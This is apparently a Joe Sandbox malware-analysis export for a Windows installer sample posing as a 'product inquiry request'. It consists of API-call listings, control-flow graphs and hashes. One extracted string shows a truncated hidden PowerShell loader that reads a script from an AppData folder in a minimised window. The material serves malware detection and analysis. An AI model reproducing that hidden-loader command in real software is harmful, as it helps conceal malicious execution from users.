                                                                        • API String ID: 1892508949-3543417879
                                                                        • Opcode ID: a01be2b36e7e5d98886c717c2ad9344b8cbd11c813b7dd34b5e33fea0deaa518
                                                                        • Instruction ID: 4b740b80641ba3a3eb8a8ec9adfde8f0bc1f07408697dd7e04d4643b588e1c06
                                                                        • Opcode Fuzzy Hash: a01be2b36e7e5d98886c717c2ad9344b8cbd11c813b7dd34b5e33fea0deaa518
                                                                        • Instruction Fuzzy Hash: 1411E231504114EBCF206FA5CD4199F37B0EF24328B28493BE912B12F1D63E49829B6E

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 776 4062a9-4062d1 call 406248 778 4062d6-4062db 776->778 779 406319 778->779 780 4062dd-40630b RegQueryValueExW RegCloseKey 778->780 782 40631d-40631f 779->782 780->779 781 40630d-406311 780->781 781->782 783 406313-406317 781->783 783->779 783->782
                                                                        APIs
                                                                        • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000800,00000002,?,00000000,?,?,: Completed,?,?,00406538,80000002), ref: 004062EF
                                                                        • RegCloseKey.ADVAPI32(?,?,00406538,80000002,Software\Microsoft\Windows\CurrentVersion,: Completed,: Completed,: Completed,00000000,Completed), ref: 004062FA
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2078423542.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2078405508.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078442214.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078765137.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_Image_Product_Inquiry_Request_Villoslada.jbxd
                                                                        Similarity
                                                                        • API ID: CloseQueryValue
                                                                        • String ID: : Completed
                                                                        • API String ID: 3356406503-2954849223
                                                                        • Opcode ID: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
                                                                        • Instruction ID: ae085d710551058a7f2532bbeea434883cb59e3c9f2bcee9d1549068d4bd9198
                                                                        • Opcode Fuzzy Hash: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
                                                                        • Instruction Fuzzy Hash: B9015A72500209EADF218F51CC09EDB3BA8EF95364F01803AFD1AA6190D738D968DFA4

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 784 4059c4-4059f5 CreateProcessW 785 405a03-405a04 784->785 786 4059f7-405a00 CloseHandle 784->786 786->785
                                                                        APIs
                                                                        • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00426710,Error launching installer), ref: 004059ED
                                                                        • CloseHandle.KERNEL32(?), ref: 004059FA
                                                                        Strings
                                                                        • Error launching installer, xrefs: 004059D7
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2078423542.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2078405508.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078442214.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078765137.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_Image_Product_Inquiry_Request_Villoslada.jbxd
                                                                        Similarity
                                                                        • API ID: CloseCreateHandleProcess
                                                                        • String ID: Error launching installer
                                                                        • API String ID: 3712363035-66219284
                                                                        • Opcode ID: 0e81a11ecc4c6fe7d2bd14f7f4550c250266fb7a2a5fb983bdda8c5a8ca6adfb
                                                                        • Instruction ID: 20697c874bd4b9c747bb4d9041eb299060a3c9f0112610a55a8a246a05e7abf4
                                                                        • Opcode Fuzzy Hash: 0e81a11ecc4c6fe7d2bd14f7f4550c250266fb7a2a5fb983bdda8c5a8ca6adfb
                                                                        • Instruction Fuzzy Hash: 7DE0BFB46002097FEB109B64ED45F7B77ACEB04708F414966BD50F6150DB7499158E7C
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2078423542.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2078405508.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078442214.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078765137.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_Image_Product_Inquiry_Request_Villoslada.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: de1cc7ed33cb2a5f92ceea0e0b8826ef96c457053bcc9743bcab908c31a2c9eb
                                                                        • Instruction ID: 32e2ab4cb65e7230aeff806a84dbae4d22e6cbaaf638251473bf6dacb733d759
                                                                        • Opcode Fuzzy Hash: de1cc7ed33cb2a5f92ceea0e0b8826ef96c457053bcc9743bcab908c31a2c9eb
                                                                        • Instruction Fuzzy Hash: 29A13231E04229CBDF28CFA8C8546ADBBB1FF45305F14806ED856BB281D7786A86DF45
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2078423542.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2078405508.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078442214.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078765137.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_Image_Product_Inquiry_Request_Villoslada.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 28c06f0f4c89ef22b384ceac7e4294a2f4c1bbf82e27332dac04b45cf64da018
                                                                        • Instruction ID: e827159e3c0f30117cfd40fb8871c1536360b3329485a12100fd3651e411c43c
                                                                        • Opcode Fuzzy Hash: 28c06f0f4c89ef22b384ceac7e4294a2f4c1bbf82e27332dac04b45cf64da018
                                                                        • Instruction Fuzzy Hash: A4912230E04228CBDF28CFA8C854BADBBB1FB45305F14816ED852BB281C7786986DF45
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2078423542.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2078405508.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078442214.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078765137.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_Image_Product_Inquiry_Request_Villoslada.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 181c382312786495426148394ea48e56d5a70372e8d229e03138d7b713aa5dd8
                                                                        • Instruction ID: e886ca087a0a39174fbb15e481659c292d22b9db4249bf85fd90a7a13df170d2
                                                                        • Opcode Fuzzy Hash: 181c382312786495426148394ea48e56d5a70372e8d229e03138d7b713aa5dd8
                                                                        • Instruction Fuzzy Hash: 99813671E04228CFDF24CFA8C8447ADBBB1FB45305F24816AD856BB291C7785986DF45
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2078423542.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2078405508.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078442214.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078765137.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_Image_Product_Inquiry_Request_Villoslada.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 482a787b1e93187f303b5cf3d5fad6fe7b39919471561c5747e88453b07a974d
                                                                        • Instruction ID: 102eaf4500afa36507883bc49c2e43cf6988b9622fad8f3b05d2dee193d28093
                                                                        • Opcode Fuzzy Hash: 482a787b1e93187f303b5cf3d5fad6fe7b39919471561c5747e88453b07a974d
                                                                        • Instruction Fuzzy Hash: 59814631E04228DBEB24CFA8C8447ADBBB1FB45305F24816AD856BB2C1D7786986DF45
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2078423542.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2078405508.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078442214.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078765137.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_Image_Product_Inquiry_Request_Villoslada.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 9f1c290fb996461610dc05284254ea561df87b77a02dec37c2f17ec044b843f5
                                                                        • Instruction ID: a08c2ff1229a9d9811f570562685937cd52cd07e2c0e62d18be643d670bbfbbc
                                                                        • Opcode Fuzzy Hash: 9f1c290fb996461610dc05284254ea561df87b77a02dec37c2f17ec044b843f5
                                                                        • Instruction Fuzzy Hash: B2712471E04228CFDF24CFA8C894BADBBB1FB45305F14806AD846BB281D7386996DF45
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2078423542.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2078405508.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078442214.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078765137.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_Image_Product_Inquiry_Request_Villoslada.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 94b25f7611fe17d8713c058a6f17e47c27a0001acd6cd4792c255928ec9836d2
                                                                        • Instruction ID: 79a44bce1fc769ef2bff189c36481e04bceb851a7a33cd9c662bfef797063258
                                                                        • Opcode Fuzzy Hash: 94b25f7611fe17d8713c058a6f17e47c27a0001acd6cd4792c255928ec9836d2
                                                                        • Instruction Fuzzy Hash: 16713571E04218CFDF28CFA8C854BADBBB1FB45305F14806AD856BB281C7786996DF45
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2078423542.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2078405508.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078442214.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078765137.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_Image_Product_Inquiry_Request_Villoslada.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 0815afd74f654c503a0d6cbf149fd97df88f382804d918d52621f4cf167551eb
                                                                        • Instruction ID: e69ca442741bc9d68f02c0d51ce09155c0cc214200520a71f8620544c8c92ec3
                                                                        • Opcode Fuzzy Hash: 0815afd74f654c503a0d6cbf149fd97df88f382804d918d52621f4cf167551eb
                                                                        • Instruction Fuzzy Hash: 78713731E04229CFEF24CF98C854BADBBB1FB45305F14806AD856BB281C7786996DF45
                                                                        APIs
                                                                        • GlobalFree.KERNEL32(00000000), ref: 00401C0B
                                                                        • GlobalAlloc.KERNELBASE(00000040,00000804), ref: 00401C1D
                                                                        Strings
                                                                        • "powershell.exe" -windowstyle minimized "$Rodfstets=Get-Content -Raw 'C:\Users\user\AppData\Local\extrality\sheepgate\Adgangseks, xrefs: 00401BC2, 00401BC8, 00401BE2
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2078423542.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2078405508.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078442214.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078765137.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_Image_Product_Inquiry_Request_Villoslada.jbxd
                                                                        Similarity
                                                                        • API ID: Global$AllocFree
                                                                        • String ID: "powershell.exe" -windowstyle minimized "$Rodfstets=Get-Content -Raw 'C:\Users\user\AppData\Local\extrality\sheepgate\Adgangseks
                                                                        • API String ID: 3394109436-1333302763
                                                                        • Opcode ID: 441a2766f8b76dee303361bd3a1725e0e5b70461bfe53946ac1114a0a53f6d38
                                                                        • Instruction ID: 8eac660807c21ed12e13958da8917723c714091cd548f80009266c163e09adae
                                                                        • Opcode Fuzzy Hash: 441a2766f8b76dee303361bd3a1725e0e5b70461bfe53946ac1114a0a53f6d38
                                                                        • Instruction Fuzzy Hash: 88219673604114DBD720AF94DDC4A5E73B4AB14324725453BF952F72D1C6BCAC418BAD
                                                                        APIs
                                                                          • Part of subcall function 004067D0: GetModuleHandleA.KERNEL32(?,00000020,?,00403501,0000000B), ref: 004067E2
                                                                          • Part of subcall function 004067D0: GetProcAddress.KERNEL32(00000000,?), ref: 004067FD
                                                                        • GetFileVersionInfoSizeW.KERNELBASE(0000000A,00000000,?,000000EE), ref: 00402040
                                                                        • GlobalAlloc.KERNEL32(00000040,00000000), ref: 0040205F
                                                                          • Part of subcall function 00406322: wsprintfW.USER32 ref: 0040632F
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2078423542.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2078405508.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078442214.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078765137.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_Image_Product_Inquiry_Request_Villoslada.jbxd
                                                                        Similarity
                                                                        • API ID: AddressAllocFileGlobalHandleInfoModuleProcSizeVersionwsprintf
                                                                        • String ID:
                                                                        • API String ID: 2520467145-0
                                                                        • Opcode ID: 6fdeac56c4586d06287112724156b1139252ad9c81010e078b61854b36556f27
                                                                        • Instruction ID: a64253ba31a40b2a88be531d949fa58fb717cf6abf4e635cd36babf92e7cfb97
                                                                        • Opcode Fuzzy Hash: 6fdeac56c4586d06287112724156b1139252ad9c81010e078b61854b36556f27
                                                                        • Instruction Fuzzy Hash: EA114A71A00208AFDB00DFA5CD85EAEBBB4EF04354F11403AF905F62A0D7759E51DB68
                                                                        APIs
                                                                        • RegQueryValueExW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,?,00000033), ref: 00402553
                                                                        • RegCloseKey.ADVAPI32(?,?,?,0040B5C8,00000000,00000011,00000002), ref: 004025F5
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2078423542.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2078405508.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078442214.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078765137.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_Image_Product_Inquiry_Request_Villoslada.jbxd
                                                                        Similarity
                                                                        • API ID: CloseQueryValue
                                                                        • String ID:
                                                                        • API String ID: 3356406503-0
                                                                        • Opcode ID: 2e501d4cb9316a084d69f20ace05ff616a97169f58b203548824d2d7eccf8ecc
                                                                        • Instruction ID: 5cbb6f6618fb34015a42ffc449654bf6e6d7e06808bec770fc6a476f8cdcdd49
                                                                        • Opcode Fuzzy Hash: 2e501d4cb9316a084d69f20ace05ff616a97169f58b203548824d2d7eccf8ecc
                                                                        • Instruction Fuzzy Hash: AA113D71910209EBDF14DFA4DE589AE7774FF04354B20453BE402B62D0D7B84A45DB5E
